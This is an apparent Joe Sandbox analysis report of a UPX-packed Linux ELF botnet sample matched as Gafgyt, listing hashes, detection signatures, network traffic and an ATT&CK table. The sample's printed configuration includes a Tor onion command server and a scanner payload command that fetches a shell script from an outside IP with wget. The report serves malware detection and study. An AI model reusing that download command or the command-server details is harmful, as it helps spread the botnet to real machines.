Edit tour
Linux
Analysis Report
x86_64.bin.elf
Overview
General Information
Sample name: | x86_64.bin.elf |
Analysis ID: | 1541867 |
MD5: | c309d84aff381e7831ba2bd5ac72d973 |
SHA1: | 95571a6646766419973682da7bb4a7dfbc64b65e |
SHA256: | bd958006ac58d9e9659025a4800c2dfc7003fb93a8fca4fc1c63f349ad688a60 |
Tags: | elfuser-abuse_ch |
Infos: |
Detection
Score: | 56 |
Range: | 0 - 100 |
Whitelisted: | false |
Signatures
Malicious sample detected (through community Yara rule)
Found Tor onion address
Sample is packed with UPX
Detected TCP or UDP traffic on non-standard ports
ELF contains segments with high entropy indicating compressed/encrypted content
Sample contains only a LOAD segment without any section mappings
Sample listens on a socket
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Yara signature match
Classification
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1541867 |
Start date and time: | 2024-10-25 09:06:42 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 13s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | defaultlinuxfilecookbook.jbs |
Analysis system description: | Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11) |
Analysis Mode: | default |
Sample name: | x86_64.bin.elf |
Detection: | MAL |
Classification: | mal56.evad.linELF@0/0@0/0 |
- VT rate limit hit for: x86_64.bin.elf
Command: | /tmp/x86_64.bin.elf |
PID: | 6258 |
Exit Code: | 0 |
Exit Code Info: | |
Killed: | False |
Standard Output: | CONFIG: Tor Enabled: true Tor Server: ypohwtgf2675muzlafm6zajxd76cirfhe75htwrvadjpf3bm7erri4id.onion Tor Port: 80 Bot server: disable Bot port: disable Scanner enabled: true Scanner payload: wget http://185.196.10.215:12234/hi.sh Scanner min num cpu: 3 Max cpu value: 90 Killer enabled: true Min-Max killer pid: 100-0 ------------------------ Process id: 6258 [main] Forked: 6264 [main] onnecting to the bot server... [killer rebind] Can't bind 22 (ssh) port: address already in use |
Standard Error: |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
Linux_Trojan_Gafgyt_28a2fe0c | unknown | unknown |
| |
Linux_Trojan_Gafgyt_28a2fe0c | unknown | unknown |
|
⊘No Suricata rule has matched
Click to jump to signature section
Show All Signature Results
Networking |
---|
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | TCP traffic: |
Source: | Socket: | Jump to behavior | ||
Source: | Socket: | Jump to behavior | ||
Source: | Socket: | Jump to behavior | ||
Source: | Socket: | Jump to behavior |
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
System Summary |
---|
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Program segment: |
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Classification label: |
Data Obfuscation |
---|
Source: | String containing UPX found: | ||
Source: | String containing UPX found: | ||
Source: | String containing UPX found: |
Source: | Submission file: | ||
Source: | Submission file: |
Source: | Binary or memory string: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | Path Interception | Path Interception | 11 Obfuscated Files or Information | OS Credential Dumping | 1 Security Software Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Rootkit | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | 1 Proxy | Traffic Duplication | Data Destruction |
⊘No configs have been found
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
3% | ReversingLabs |
⊘No Antivirus matches
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe |
⊘No contacted domains info
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | unknown | |||
true | unknown | |||
false | unknown | |||
true | unknown | |||
false | unknown | |||
false | unknown | |||
false | unknown | |||
false | unknown | |||
true | unknown | |||
false | unknown | |||
true |
| unknown | ||
false | unknown | |||
false | unknown | |||
true | unknown | |||
false | unknown | |||
false | unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
198.50.207.21 | unknown | Canada | 16276 | OVHFR | false | |
109.202.202.202 | unknown | Switzerland | 13030 | INIT7CH | false | |
91.189.91.43 | unknown | United Kingdom | 41231 | CANONICAL-ASGB | false | |
91.189.91.42 | unknown | United Kingdom | 41231 | CANONICAL-ASGB | false |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
109.202.202.202 | Get hash | malicious | Unknown | Browse |
| |
91.189.91.43 | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
91.189.91.42 | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse |
⊘No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
CANONICAL-ASGB | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
CANONICAL-ASGB | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
OVHFR | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | TechSupportScam | Browse |
| ||
Get hash | malicious | Mirai, Okiru | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
INIT7CH | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
⊘No context
⊘No context
⊘No created / dropped files found
File type: | |
Entropy (8bit): | 7.999916174065972 |
TrID: |
|
File name: | x86_64.bin.elf |
File size: | 2'866'968 bytes |
MD5: | c309d84aff381e7831ba2bd5ac72d973 |
SHA1: | 95571a6646766419973682da7bb4a7dfbc64b65e |
SHA256: | bd958006ac58d9e9659025a4800c2dfc7003fb93a8fca4fc1c63f349ad688a60 |
SHA512: | 474f71e6ebf80b9372aa6120a60d53d37e6ccbb2509d99b9b56c1541fac5a95f9147577fd2949ad115018101b77dbe8b1af32989e8da1f08b75e021de140abfa |
SSDEEP: | 49152:nZ8+xYxREQ37ETfCPW2j72C0I+FZxjflafyl/5O9/Hrn8DKUH7lyrRut9hLw5r:nZf0EvTqPfjqCSFZxjflaqBm/IK+lyky |
TLSH: | CDD533FC22D950089BE213B515D54BCCAE0BE340CA84F222767B0D6EA57066CF93F6B0 |
File Content Preview: | .ELF..............>.....H.......@...................@.8...........................@.......@.............bL...............................P.......P....../.+...../.+.............Q.td....................................................C...UPX!.........@....d |
ELF header | |
---|---|
Class: | |
Data: | |
Version: | |
Machine: | |
Version Number: | |
Type: | |
OS/ABI: | |
ABI Version: | 0 |
Entry Point Address: | |
Flags: | |
ELF Header Size: | 64 |
Program Header Offset: | 64 |
Program Header Size: | 56 |
Number of Program Headers: | 3 |
Section Header Offset: | 0 |
Section Header Size: | 0 |
Number of Section Headers: | 0 |
Header String Table Index: | 0 |
Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align | Prog Interpreter | Section Mappings |
---|---|---|---|---|---|---|---|---|---|---|---|
LOAD | 0x0 | 0x400000 | 0x400000 | 0x1000 | 0x9f4c62 | 7.8235 | 0x6 | RW | 0x1000 | ||
LOAD | 0x0 | 0xdf5000 | 0xdf5000 | 0x2bbe2f | 0x2bbe2f | 7.9999 | 0x5 | R E | 0x1000 | ||
GNU_STACK | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0.0000 | 0x6 | RW | 0x8 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Oct 25, 2024 09:07:40.802947998 CEST | 42836 | 443 | 192.168.2.23 | 91.189.91.43 |
Oct 25, 2024 09:07:41.826797009 CEST | 42516 | 80 | 192.168.2.23 | 109.202.202.202 |
Oct 25, 2024 09:07:56.672846079 CEST | 43928 | 443 | 192.168.2.23 | 91.189.91.42 |
Oct 25, 2024 09:08:06.911504030 CEST | 42836 | 443 | 192.168.2.23 | 91.189.91.43 |
Oct 25, 2024 09:08:13.054688931 CEST | 42516 | 80 | 192.168.2.23 | 109.202.202.202 |
Oct 25, 2024 09:08:37.627300024 CEST | 43928 | 443 | 192.168.2.23 | 91.189.91.42 |
Oct 25, 2024 09:08:49.150661945 CEST | 1024 | 37932 | 198.50.207.21 | 192.168.2.23 |
Oct 25, 2024 09:08:49.151217937 CEST | 37932 | 1024 | 192.168.2.23 | 198.50.207.21 |
Oct 25, 2024 09:08:58.104553938 CEST | 42836 | 443 | 192.168.2.23 | 91.189.91.43 |
Oct 25, 2024 09:09:30.406687975 CEST | 1024 | 59100 | 198.50.207.21 | 192.168.2.23 |
Oct 25, 2024 09:09:30.406948090 CEST | 59100 | 1024 | 192.168.2.23 | 198.50.207.21 |
System Behavior
Start time (UTC): | 07:07:37 |
Start date (UTC): | 25/10/2024 |
Path: | /tmp/x86_64.bin.elf |
Arguments: | /tmp/x86_64.bin.elf |
File size: | 2866968 bytes |
MD5 hash: | c309d84aff381e7831ba2bd5ac72d973 |
Start time (UTC): | 07:07:37 |
Start date (UTC): | 25/10/2024 |
Path: | /tmp/x86_64.bin.elf |
Arguments: | - |
File size: | 2866968 bytes |
MD5 hash: | c309d84aff381e7831ba2bd5ac72d973 |